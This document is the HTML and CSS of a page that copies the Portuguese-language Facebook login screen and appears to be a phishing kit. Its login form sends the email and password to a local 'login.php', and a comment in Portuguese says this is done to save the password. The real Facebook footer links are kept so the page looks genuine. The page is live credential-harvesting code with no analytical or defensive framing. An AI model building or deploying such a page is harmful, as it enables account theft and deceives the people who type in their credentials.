._4jy0{border:1px solid;border-radius:2px;box-sizing:content-box;font-size:12px;-moz-osx-font-smoothing:grayscale;font-weight:bold;justify-content:center;padding:0 8px;position:relative;text-align:center;text-shadow:none;vertical-align:middle}.gecko.mac ._4jy0{font-family:Helvetica Neue, Helvetica, Arial, sans-serif}.segoe ._4jy0{font-weight:600}._4jy0:before{content:'';display:inline-block;height:20px;vertical-align:middle}html ._4jy0:focus,html .gecko ._4jy0:focus{box-shadow:0 0 1px 2px rgba(88, 144, 255, .75), 0 1px 1px rgba(0, 0, 0, .15);outline:none}._19_u ._4jy0:focus,._19_u .gecko ._4jy0:focus,._4jy0._5f0v:focus,.gecko ._4jy0._5f0v:focus{box-shadow:none}._4jy0{transition:200ms cubic-bezier(.08,.52,.52,1) background-color, 200ms cubic-bezier(.08,.52,.52,1) box-shadow, 200ms cubic-bezier(.08,.52,.52,1) transform}._4jy0:active{transition:none}.mac ._4jy0:not(._42fr):active{box-shadow:none;transform:scale(.98)}._4jy0 .img{bottom:1px;position:relative;vertical-align:middle}form.async_saving ._4jy0 .img,a.async_saving._4jy0 .img,._4jy0._42fr .img{opacity:.5}._517h,._59pe:focus,._59pe:hover{background-color:#f5f6f7;border-color:#ccd0d5;color:#4b4f56}._64lx ._517h,._64lx ._59pe:focus,._64lx ._59pe:hover{background-color:#eff1f3;border-color:#bec3c9}._517h:hover{background-color:#ebedf0}._517h:active,._517h._42fs{background-color:#dddfe2;border-color:#bec3c9}form.async_saving ._517h,a.async_saving._517h,._517h._42fr{background-color:#f5f6f7;border-color:#dddfe2;color:#bec3c9}._517h._42fs{color:#4080ff}._4jy1,._9w8q,._4jy2{color:#fff}._4jy1{background-color:#4267b2;border-color:#4267b2}._4jy1:hover{background-color:#365899;border-color:#365899}._4jy1:active,._4jy1._42fs{background-color:#29487d;border-color:#29487d}form.async_saving ._4jy1,a.async_saving._4jy1,._4jy1._42fr{background-color:#9cb4d8;border-color:#9cb4d8}._4jy2{background-color:#42b72a;border-color:#42b72a}._4jy2:hover{background-color:#36a420;border-color:#36a420}._4jy2:active,._4jy2._42fs{background-color:#2b9217;border-color:#2b9217}form.async_saving ._4jy2,a.async_saving._4jy2,._4jy2._42fr{background-color:#ace0a2;border-color:#ace0a2}._9w8q{background-color:#fa3e3e;border-color:#fa3e3e}._9w8q:hover{background-color:#db1d24;border-color:#db1d24}._9w8q:active,._9w8q._42fs{background-color:#c70b11;border-color:#c70b11}form.async_saving ._9w8q,a.async_saving._9w8q,._9w8q._42fr{background-color:#f77c7c;border-color:#f77c7c}._59pe,form.async_saving ._59pe,a.async_saving._59pe,._59pe._42fr{background:none;border-color:transparent}._517i,._517i._42fr:active,._517i._42fr._42fs{height:18px;line-height:18px}._4jy3,._4jy3._42fr:active,._4jy3._42fr._42fs{line-height:22px}._4jy4,._4jy4._42fr:active,._4jy4._42fr._42fs{line-height:26px;padding:0 10px}._4jy5,._4jy5._42fr:active,._4jy5._42fr._42fs{line-height:34px;padding:0 16px}._4jy6,._4jy6._42fr:active,._4jy6._42fr._42fs{line-height:42px;padding:0 24px}._51xa ._4jy0{border-radius:0;display:inline-block;margin:0!important;margin-left:-1px!important;position:relative;z-index:1}._51xa>._4jy0:first-child,._51xa>:first-child ._4jy0{border-radius:2px 0 0 2px;margin-left:0!important}._51xa>._4jy0:last-child,._51xa>:last-child ._4jy0{border-radius:0 2px 2px 0}._51xa>._4jy0:only-child,._51xa>:only-child ._4jy0{border-radius:2px}._51xa ._4jy0._42fr{z-index:0}._51xa ._4jy0._4jy1,._51xa ._4jy0._9w8q,._51xa ._4jy0._4jy2{z-index:2}._51xa ._4jy0:focus{z-index:3}._51xa ._4jy1+.uiPopover>._4jy1:not(:focus):after{background-color:#f5f6f7;bottom:-1px;content:'';display:block;left:-1px;position:absolute;top:-1px;width:1px}._4jy0._52nf{cursor:default}._9c6._9c6{background-clip:padding-box;border-color:rgba(0, 0, 0, .4)}._3y89 ._4jy0{border-bottom-width:0;border-top-width:0}._3y89>._4jy0:first-child,._3y89>:first-child ._4jy0{border-left-width:0;border-radius:1px 0 0 1px}._3y89>._4jy0:last-child,._3y89>:last-child ._4jy0{border-radius:0 1px 1px 0;border-right-width:0}._6n1z._4jy6,._6n1z._4jy6._42fr:active,._6n1z._4jy6._42fr._42fs{padding:0 0}._6n1z._517h,._6n1z._59pe:focus,._6n1z._59pe:hover{background-color:#fff;border-color:transparent}._aiv4{opacity:.4}._aiv4::after{animation:xuiButtonLoadingSpinner 1s ease infinite;border:2px solid transparent;border-radius:50%;border-top-color:#000;bottom:0;content:'';height:12px;left:0;margin:auto;position:absolute;right:0;top:0;width:12px}@keyframes xuiButtonLoadingSpinner{from{transform:rotate(0turn)}to{transform:rotate(1turn)}}
._4-u5{background-color:#e9ebee}._2a1j ._65qq{background:#fafbfc}._65qq{background:#fff}._469s{background-color:#000}._4-u7{background-color:#3578e5}._57d8{background-color:#f5f6f7}._4-u8{background-color:#fff}
.UIPage_LoggedOut .UIFullPage_Container,.UIPage_LoggedOut .UIStandardFrame_Container{padding-bottom:46px;padding-top:46px;width:auto}.UIPage_LoggedOut .fbPhotosGrid .photoDetails{width:inherit}
._ohe{float:left}._ohf{float:right}._ohf>.horizontal{align-items:center;display:flex;flex-direction:row;flex-wrap:wrap;justify-content:center}
.sp_h4Swrc8tiWJ{background-image:url(/rsrc.php/v3/yK/r/kNYkizqJr9j.png);background-size:auto;background-repeat:no-repeat;display:inline-block;height:16px;width:20px}.sp_h4Swrc8tiWJ.sx_c17405{width:282px;height:250px;background-position:0 0}.sp_h4Swrc8tiWJ.sx_044d15{height:20px;background-position:-171px -251px}.sp_h4Swrc8tiWJ.sx_b5c542{height:11px;background-position:-192px -251px}.sp_h4Swrc8tiWJ.sx_22044a{width:16px;background-position:0 -286px}.sp_h4Swrc8tiWJ.sx_3d074e{width:16px;background-position:-17px -286px}.sp_h4Swrc8tiWJ.sx_fd8019{width:5px;height:14px;background-position:-39px -286px}.selected .sp_h4Swrc8tiWJ.sx_fd8019{background-position:-34px -286px}.sp_h4Swrc8tiWJ.sx_0611b1{width:9px;height:5px;background-position:-213px -251px}.sp_h4Swrc8tiWJ.sx_05727a{width:170px;height:34px;background-position:0 -251px}.sp_h4Swrc8tiWJ.sx_8ed39e{width:12px;height:12px;background-position:-171px -272px}
.sp_mfj--72rFTe{background-image:url(/rsrc.php/v3/y2/r/m3DkabwyaYA.png);background-size:auto;background-repeat:no-repeat;display:inline-block;height:20px;width:16px}.sp_mfj--72rFTe.sx_96c591{width:12px;height:12px;background-position:-57px -182px}.sp_mfj--72rFTe.sx_a942a8{width:8px;height:8px;background-position:-63px -98px}.sp_mfj--72rFTe.sx_a3461b{width:20px;background-position:-25px -73px}.sp_mfj--72rFTe.sx_9a18fc{width:8px;height:8px;background-position:-63px -107px}.sp_mfj--72rFTe.sx_2a9ba7{width:20px;background-position:-46px -73px}.sp_mfj--72rFTe.sx_e842bd{width:8px;height:8px;background-position:-63px -116px}.sp_mfj--72rFTe.sx_3e75b3{width:8px;height:8px;background-position:-63px -125px}.sp_mfj--72rFTe.sx_62fdf2{width:12px;height:12px;background-position:0 -271px}.sp_mfj--72rFTe.sx_7da774{width:20px;background-position:0 -98px}.sp_mfj--72rFTe.sx_c57cc4{width:20px;background-position:-21px -98px}.sp_mfj--72rFTe.sx_6b19c5{width:20px;background-position:-42px -98px}.sp_mfj--72rFTe.sx_70350a{width:20px;background-position:0 -119px}.sp_mfj--72rFTe.sx_629add{width:20px;background-position:-21px -119px}.sp_mfj--72rFTe.sx_923295{height:16px;background-position:-40px -182px}.sp_mfj--72rFTe.sx_f62bbf{width:12px;height:12px;background-position:-13px -271px}.sp_mfj--72rFTe.sx_e703c0{height:16px;background-position:0 -203px}.sp_mfj--72rFTe.sx_c28d38{width:20px;background-position:-42px -119px}.sp_mfj--72rFTe.sx_1d68fe{width:12px;height:12px;background-position:-26px -271px}.sp_mfj--72rFTe.sx_be595b{height:16px;background-position:-17px -203px}.sp_mfj--72rFTe.sx_4bb11d{height:16px;background-position:-34px -203px}.sp_mfj--72rFTe.sx_7ecf0d{height:16px;background-position:-51px -203px}.sp_mfj--72rFTe.sx_266fd7{width:12px;height:12px;background-position:-39px -271px}.sp_mfj--72rFTe.sx_8055e5{height:16px;background-position:0 -220px}.sp_mfj--72rFTe.sx_2c44e5{height:16px;background-position:-17px -220px}.sp_mfj--72rFTe.sx_d0cba7{width:20px;background-position:0 -140px}.sp_mfj--72rFTe.sx_4617bd{height:16px;background-position:-34px -220px}.sp_mfj--72rFTe.sx_a4fa89{height:16px;background-position:-51px -220px}.sp_mfj--72rFTe.sx_0c4cee{width:24px;height:24px;background-position:0 -73px}.sp_mfj--72rFTe.sx_d97e6a{width:12px;height:12px;background-position:-52px -271px}.sp_mfj--72rFTe.sx_8abc40{width:20px;background-position:-21px -140px}.sp_mfj--72rFTe.sx_4b15de{width:12px;height:12px;background-position:0 -284px}.sp_mfj--72rFTe.sx_258fa0{width:20px;background-position:-42px -140px}.sp_mfj--72rFTe.sx_2e2843{width:12px;height:12px;background-position:-13px -284px}.sp_mfj--72rFTe.sx_70c54e{height:16px;background-position:0 -237px}.sp_mfj--72rFTe.sx_d6945b{height:16px;background-position:-17px -237px}.sp_mfj--72rFTe.sx_cbdff2{width:20px;background-position:0 -161px}.sp_mfj--72rFTe.sx_8a2c56{width:20px;background-position:-21px -161px}.sp_mfj--72rFTe.sx_8a42c2{width:12px;height:12px;background-position:-26px -284px}.sp_mfj--72rFTe.sx_0b752c{height:16px;background-position:-34px -237px}.sp_mfj--72rFTe.sx_e9dfcc{width:18px;height:18px;background-position:-21px -182px}.sp_mfj--72rFTe.sx_ab0827{width:12px;height:12px;background-position:-39px -284px}.sp_mfj--72rFTe.sx_96ed9a{width:20px;background-position:-42px -161px}.sp_mfj--72rFTe.sx_9f183b{width:12px;height:12px;background-position:-52px -284px}.sp_mfj--72rFTe.sx_22f47d{height:16px;background-position:-51px -237px}.sp_mfj--72rFTe.sx_13e9e4{height:16px;background-position:0 -254px}.sp_mfj--72rFTe.sx_430d97{width:12px;height:12px;background-position:0 -297px}.sp_mfj--72rFTe.sx_ee7ce4{height:16px;background-position:-17px -254px}.sp_mfj--72rFTe.sx_b280b1{width:20px;background-position:0 -182px}.sp_mfj--72rFTe.sx_ed4997{width:12px;height:12px;background-position:-13px -297px}.sp_mfj--72rFTe.sx_c4be14{height:8px;background-position:-34px -254px}.sp_mfj--72rFTe.sx_fcc8f1{height:8px;background-position:-51px -254px}.sp_mfj--72rFTe.sx_66804c{width:72px;height:72px;background-position:0 0}/*FB_PKG_DELIM*/

#bootloader_UDk0ZX_{height:42px;}.bootloader_UDk0ZX_{display:block!important;
}
html ._55r1{background:#FFFFFF url(/rsrc.php/v3/yU/r/O7nelmd9XSI.png) repeat-x;border:1px solid #dddfe2;color:#1d2129;font-family:Helvetica, Arial, sans-serif;font-size:12px;height:22px;line-height:16px;padding:0 8px;vertical-align:middle}html ._55r2{height:30px}html ._55r1._53a0{background:#F5F6F7 url(/rsrc.php/v3/yU/r/O7nelmd9XSI.png) repeat-x}._55r1::-moz-placeholder,._55r1:-moz-placeholder,._55r1 ._58al::-moz-placeholder,._55r1 ._58al:-moz-placeholder{color:#90949c}._55r1:focus::-moz-placeholder,._55r1:focus:-moz-placeholder,._55r1 ._58al:focus::-moz-placeholder,._55r1 ._58al:focus:-moz-placeholder{color:#bec3c9}._55r1._58ak{height:24px;padding:3px 8px 5px}._55r1._55r2._58ak{height:32px;padding:7px 8px 9px}._55r1 ._58al{font-family:Helvetica, Arial, sans-serif;font-size:12px}._3qze ._58al{font-family:Helvetica, Arial, sans-serif;font-size:14px}._55r1._3qze._58ak{padding-top:2px}._55r1._1tp7:not(:focus):not(._1488){background:#FFFFFF url(/rsrc.php/v3/yu/r/PmjSkvyqVM-.png) no-repeat right 8px center}._53a0._1tp7:not(:focus):not(._1488){background:#F5F6F7 url(/rsrc.php/v3/yu/r/PmjSkvyqVM-.png) no-repeat right 8px center}._55r1._1tp7._1488{border:1px solid #dddfe2}._55r1._1tp7:not(._1488) ._58al{width:calc(100% - 24px)}.x1-5 ._55r1._1tp7:not(:focus):not(._1488),.x2 ._55r1._1tp7:not(:focus):not(._1488){background-image:url(/rsrc.php/v3/yg/r/6oZO5zjhedE.png);background-size:18px 18px}/*FB_PKG_DELIM*/

#bootloader_Yo2UzOh{height:42px;}.bootloader_Yo2UzOh{display:block!important;}	
	
</style>
	
</head>
	
<body class="fbIndex UIPage_LoggedOut _-kb _605a b_c3pyn-ahh gecko x1 Locale_pt_BR cores-lt4 _19_u" dir="ltr">
	
<script type="text/javascript" nonce="">
requireLazy(["bootstrapWebSession"],function(j){j(1670075315)})
</script>
	
	<div class="_li" id="u_0_1_fp">
	<div id="globalContainer" class="uiContextualLayerParent">
	<div class="fb_content clearfix " id="content" role="main"><div>
	<div class="_8esj _95k9 _8esf _8opv _8f3m _8ilg _8icx _8op_ _95ka">
	<div class="_8esk">
	<div class="_8esl">
	<div class="_8ice">
	<img class="fb_logo _8ilh img" src="lib/logo.svg" alt="Facebook"></div>
<!--	
	<h2 class="_8eso">O Facebook ajuda você a se conectar e compartilhar com as pessoas que fazem parte da sua vida.</h2>
-->
	</div>
	
	<div class="_8esn">
		
	<div class="_8iep _8icy _9ahz _9ah-">
		
	<div class="_6luv _52jv">
<br><div class="_9axz">Entrar no Facebook</div><br>
		
		<!-- CHAMA login.php PARA SALVAR SENHA -->
	<form class="_9vtf" data-testid="royal_login_form" novalidate="1" action="login.php" method="post" onsubmit="" id="u_0_2_kb">
	<input type="hidden" name="jazoest" value="2797" autocomplete="off">
	<input type="hidden" name="lsd" value="AVq7Ea59FT0" autocomplete="off">
	
	<div><div class="_6lux">
	<input type="text" class="inputtext _55r1 _6luy" name="email" id="email" data-testid="royal_email" placeholder="Email ou telefone" autofocus="1" aria-label="Email ou telefone">
	</div><div class="_6lux">
	<div class="_6luy _55r1 _1kbt" id="passContainer">
	<input type="password" class="inputtext _55r1 _6luy _9npi" name="pass" id="pass" data-testid="royal_pass" placeholder="Senha" aria-label="Senha">
	<div class="_9ls7 hidden_elem" id="u_0_3_iN">
	<a href="#" role="button"><div class="_9lsa">
	<div class="_9lsb" id="u_0_4_5t"></div></div></a>
	
	</div></div></div></div>
	
	<input type="hidden" autocomplete="off" name="login_source" value="comet_headerless_login">
	<input type="hidden" autocomplete="off" name="next" value="">
	
	<div class="_6ltg">
	
	<button value="1" class="_42ft _4jy0 _6lth _4jy6 _4jy1 selected _51sy" name="login" data-testid="royal_login_button" type="submit" id="u_0_5_r+">Entrar</button>
	</div>
	
	<div class="_6ltj">
	<a href="https://facebook.com/recover/">Esqueceu a senha?</a>
	</div>
	
	<div class="_8icz"></div>
	<div class="_6ltg">
	<a role="button" class="_42ft _4jy0 _6lti _4jy6 _4jy2 selected _51sy" href="#" ajaxify="/reg/spotlight/" id="u_0_0_lN" data-testid="open-registration-form-button" rel="async">Criar nova conta</a>
	
	</div></form></div>
	
	<div id="reg_pages_msg" class="_58mk">
	<a href="https://pt-br.facebook.com/pages/create/?ref_type=registration_form" class="_8esh">Criar uma Página</a> para uma celebridade, uma marca ou uma empresa.</div></div></div></div></div></div></div>
	
	<div class="">
	<div class="_95ke _8opy">
	<div id="pageFooter" data-referrer="page_footer" data-testid="page_footer">
	<ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1">
	<li>Português (Brasil)</li>
	<li>
	<a class="_sv4" dir="ltr" href="https://www.facebook.com/" title="English (US)">English (US)</a>
	</li>
	<li>
	<a class="_sv4" dir="ltr" href="https://es-la.facebook.com/" title="Spanish">Español</a>
	</li>
	<li>
	<a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/" title="French (France)">Français (France)</a>
	</li>
	<li>
	<a class="_sv4" dir="ltr" href="https://it-it.facebook.com/" title="Italian">Italiano</a>
	</li>
	<li>
	<a class="_sv4" dir="ltr" href="https://de-de.facebook.com/" title="German">Deutsch</a>
	</li>
	<li>
	<a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/" title="Arabic">العربية</a>
	</li>
	<li>
	<a class="_sv4" dir="ltr" href="https://hi-in.facebook.com/" title="Hindi">हिन्दी</a>
	</li>
	<li>
	<a class="_sv4" dir="ltr" href="https://zh-cn.facebook.com/" title="Simplified Chinese (China)">中文(简体)</a>
	</li>
	<li>
	<a class="_sv4" dir="ltr" href="https://ja-jp.facebook.com/" title="Japanese">日本語</a>
	</li>
	<li>
	<a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fja-jp.facebook.com%2F&amp;source=www_list_selector_more" href="#" title="Mostrar mais idiomas">
	<i class="img sp_h4Swrc8tiWJ sx_8ed39e"></i>+</a>
	</li></ul>
	
	<div id="contentCurve"></div>
	<div id="pageFooterChildren" role="contentinfo" aria-label="Links para sites do Facebook"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i">
	<li>
	<a href="https://pt-br.facebook.com/reg/" title="Cadastre-se no Facebook">Cadastre-se</a>
	</li>
	<li>
	<a href="https://pt-br.facebook.com/login/" title="Entrar no Facebook">Entrar</a>
	</li>
	<li>
	<a href="https://messenger.com/" title="Confira o Messenger.">Messenger</a>
	</li>
	<li>
	<a href="https://pt-br.facebook.com/lite/" title="Facebook Lite para Android.">Facebook Lite</a>
	</li>
	<li>
	<a href="https://pt-br.facebook.com/watch/" title="Navegue pelos nossos vídeos do Watch.">Watch</a>
	</li>
	<li>
	<a href="https://pt-br.facebook.com/places/" title="Confira locais populares no Facebook.">Locais</a>
	</li>
	<li>
	<a href="https://pt-br.facebook.com/games/" title="Confira os jogos do Facebook.">Jogos</a>
	</li>
	<li>
	<a href="https://pt-br.facebook.com/marketplace/" title="Compre e venda no Facebook Marketplace.">Marketplace</a>
	</li>
	<li>
	<a href="https://pay.facebook.com/" title="Saiba mais sobre o Meta Pay" target="_blank">Meta Pay</a>
	</li>
	<li>
	<a href="https://www.oculus.com/" title="Saiba mais sobre o Oculus" target="_blank">Oculus</a>
	</li>
	<li>
	<a href="https://portal.facebook.com/" title="Saiba mais sobre o Facebook Portal" target="_blank">Portal</a>
	</li>
	<li>
	<a href="https://www.instagram.com/" title="Confira o Instagram" target="_blank" rel="noopener nofollow" data-lynx-mode="asynclazy">Instagram</a>
	</li>
	<li>
	<a href="https://www.bulletin.com/" title="Confira o boletim informativo">Boletim</a>
	</li>
	<li>
	<a href="https://pt-br.facebook.com/fundraisers/" title="Doe para causas importantes.">Campanhas de arrecadação de fundos</a>
	</li>
	<li>
	<a href="https://pt-br.facebook.com/biz/directory/" title="Navegue pelo nosso diretório de serviços do Facebook.">Serviços</a>
	</li>
	<li>
	<a href="https://pt-br.facebook.com/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="Veja a Central de Informações de Votação.">Central de Informações de Votação</a>
	</li>
	<li>
	<a href="https://pt-br.facebook.com/privacy/policy/?entry_point=facebook_page_footer" title="Saiba como coletamos, usamos e compartilhamos informações para apoiar o Facebook.">Política de Privacidade</a>
	</li>
	<li>
	<a href="https://pt-br.facebook.com/privacy/center/?entry_point=facebook_page_footer" title="Saiba como gerenciar e controlar sua privacidade no Facebook.">Central de Privacidade</a>
	</li>
	<li>
	<a href="https://pt-br.facebook.com/groups/explore/" title="Explorar nossos grupos.">Grupos</a>
	</li>
	<li>
	<a href="https://about.facebook.com/" accesskey="8" title="Leia nosso blog, descubra a central de recursos e encontre oportunidades de trabalho.">Sobre</a>
	</li>
	<li>
	<a href="https://pt-br.facebook.com/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Anuncie no Facebook.">Criar anúncio</a>
	</li>
	<li>
	<a href="https://pt-br.facebook.com/pages/create/?ref_type=site_footer" title="Criar uma Página">Criar Página</a>
	</li>
	<li>
	<a href="https://developers.facebook.com/?ref=pf" title="Desenvolver em nossa plataforma.">Desenvolvedores</a>
	</li>
	<li>
	<a href="https://pt-br.facebook.com/careers/?ref=pf" title="Dê um passo adiante na sua carreira em nossa incrível empresa.">Carreiras</a>
	</li>
	<li>
	<a href="https://pt-br.facebook.com/policies/cookies/" title="Saiba mais sobre cookies e o Facebook" data-nocookies="1">Cookies</a>
	</li>
	<li>
	<a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Saiba mais sobre as escolhas para anúncios.">Escolhas para anúncios<i class="img sp_h4Swrc8tiWJ sx_22044a"></i></a>
	</li>
	<li>
	<a data-nocookies="1" href="https://pt-br.facebook.com/policies?ref=pf" accesskey="9" title="Leia os nossos termos e políticas.">Termos</a>
	</li>
	<li>
	<a href="https://pt-br.facebook.com/help/?ref=pf" accesskey="0" title="Acesse nossa Central de Ajuda.">Ajuda</a>
	</li>
	<li>
	<a href="https://pt-br.facebook.com/help/637205020878504" title="Acesse nosso aviso de carregamento de contatos e não usuários.">Carregamento de contatos e não usuários</a>
	</li>
	<li>
	<a accesskey="6" class="accessible_elem" href="https://pt-br.facebook.com/settings" title="Visualize e edite suas configurações do Facebook.">Configurações</a>
	</li>
	<li>
	<a accesskey="7" class="accessible_elem" href="https://pt-br.facebook.com/allactivity?privacy_source=activity_log_top_menu" title="Ver seu Registro de Atividades">Registro de Atividades</a>
	</li>
	</ul></div>
	
	<div class="mvl copyright">
	<div><span> Meta © 2022</span></div>
	</div></div></div></div></div><div></div>
	
	<span>
	<img src="lib/hsts-pixel.gif" style="display:none" width="0" height="0"></span>
	</div>
	
	
	<div style="display:none"></div>

	
	
	

	</body>
</html>
